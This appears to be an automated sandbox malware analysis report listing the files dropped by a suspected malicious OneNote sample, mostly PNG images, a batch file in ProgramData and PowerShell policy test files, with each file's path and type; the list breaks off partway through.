Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

Original.one

data

initial sample

C:\ProgramData\in.cmd

ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D95B36A3-A6E1-458A-A353-27D51DD43A0C

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

Matlab v4 mat-file (little endian) , numeric, rows 262223750, columns 0

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000005.bin

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000006.bin

PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin

PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin

PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000B.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin

PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000D.bin

PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000E.bin

PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000F.bin

PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000G.bin

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000H.bin

PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000I.bin

PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000J.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000K.bin

PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000M.bin

PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000N.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000O.bin

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000P.bin

PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000Q.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000R.bin

PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000S.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000T.bin

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000U.bin

PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000V.bin

PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000010.bin

PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000011.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000012.bin

PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000013.bin

PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000014.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000015.bin

PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000016.bin

PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000017.bin

PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000018.bin

PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000019.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001C.bin

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001D.bin

PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001E.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001F.bin

PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001G.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001H.bin

PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001I.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001J.bin

PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001K.bin

PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001L.bin

PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001M.bin

PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001N.bin

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001O.bin

PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001P.bin

PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001Q.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001R.bin

PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001T.bin

PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001U.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001V.bin

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000020.bin

PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000021.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000022.bin

PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000024.bin

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin

PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000026.bin

PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000027.bin

PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000028.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000029.bin

PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002A.bin

PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002B.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002C.bin

PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002D.bin

PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002E.bin

PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002F.bin

PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002G.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002H.bin

PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002I.bin

PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002J.bin

PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002K.bin

PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002L.bin

PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002M.bin

PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002N.bin

PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002O.bin

PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002P.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002Q.bin

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002R.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002S.bin

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002T.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002U.bin

PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002V.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000030.bin

PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000031.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000032.bin

PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000033.bin

PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000034.bin

PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000035.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000036.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000037.bin

PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000038.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000039.bin

PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003A.bin

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003B.bin

PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003C.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003D.bin

PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003E.bin

PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003F.bin

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003G.bin

PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003H.bin

PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003I.bin

PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003J.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003K.bin

PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003Q.bin

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003R.bin

PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003S.bin

PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003T.bin

PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003U.bin

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003V.bin

PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000040.bin

PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000041.bin

PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000042.bin

PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000043.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000044.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000045.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000046.bin

PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000047.bin

PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000048.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000049.bin

PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004B.bin

PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004C.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004D.bin

PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004E.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004F.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004G.bin

PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004H.bin

PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004I.bin

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004J.bin

PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004K.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004L.bin

PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004M.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004N.bin

PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004O.bin

PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004P.bin

PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004Q.bin

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004R.bin

PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004S.bin

PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004T.bin

PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004U.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000051.bin

PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000052.bin

PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000053.bin

ASCII text, with very long lines (372), with no line terminators

dropped

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000054.bin

GIF image data, version 89a, 1012 x 327

dropped

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

data

dropped

C:\Users\user\AppData\Local\Temp\OneNote Archive\Getting Started.one

data

dropped

C:\Users\user\AppData\Local\Temp\OneNote Archive\Open Notebook.onetoc2

data

dropped

C:\Users\user\AppData\Local\Temp\OneNote15WatsonLog.etl

data

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54qw5cdw.to2.psm1

very short file (no magic)

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gf3ru34.23y.psm1

very short file (no magic)

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhdcypmx.keq.ps1

very short file (no magic)

dropped

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnqo3hxp.opj.ps1

very short file (no magic)

dropped

C:\Users\user\AppData\Local\Temp\{01DF93F7-D7C8-49E7-ACF5-42B9506E720C}

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{03EF2E50-AC66-4BEA-B2D2-3F37B5438107}

PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{053808ED-A823-43D4-B7CE-AD53FBCCEA07}

PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{05A11B15-896E-4291-A74E-B32FD8C5FCB8}.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{05C26474-B79F-440C-AF51-8AF8DFB93FEB}

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{1393251E-863A-422A-AFE0-46368B47935D}

PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{1446C4F2-FA63-4782-87AC-6D2620EBBF7C}.bin

PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{14E5622A-6AFA-4099-A7F6-553D29AAF903}

PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{150E099A-9CB1-46FE-929D-FBA8FAEEBB43}.bin

PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{16C683EC-AFC0-46C0-A881-2CE20AB3EC36}

PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{16F2CCD3-7155-4342-AAAB-D953EC136172}.bin

PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{1718266F-658B-40B4-8876-19AC9018A8CF}.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{183C2899-6A9F-4D0A-BC4D-3C1956484210}.bin

PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{18586D77-A491-41E1-9B55-484FAC587C99}

PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{18710D6B-F1E6-4CEC-B2E3-88F6F8F6ADEC}

PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{1C54229F-B4AC-4B4F-A5C4-B6C0870196B9}

PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{20691C45-3912-4E04-9F9D-7D785AADBB33}

PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{22C00A46-DB88-4EF8-9B6E-FA6F60F7F1EF}.bin

PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{235F4D30-C8DD-49E5-ACF3-C6D78A5C54D8}.bin

PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{23D3D0F8-5DF7-4934-B460-BAA6B954BE34}.bin

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{24383C51-047F-41BD-A1B0-F3217D15FC44}.bin

PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{2741F630-66F3-4FC2-A595-4AAEF2545FD7}.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{27D3169C-2C40-403C-9C05-53FD1A6D7C54}.bin

PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{2870A86B-64C3-4442-809B-DCA34ACE9854}

PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{2949D679-7E97-4142-90C8-19A1367FE15E}.bin

PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{29D0BF62-CFEF-4BA3-87B4-DA58BF4FF1E5}.bin

PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{2B55F746-CF70-4BC6-8D87-4EB1BAF41179}.bin

PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{2BE2AE42-E830-4B6B-94A2-CFF047372A86}

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{2CA96999-535B-4CAB-83DB-494328159237}.bin

PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced

dropped

C:\Users\user\AppData\Local\Temp\{2CBEF025-7A03-47E9-860E-47A4CC399F77}

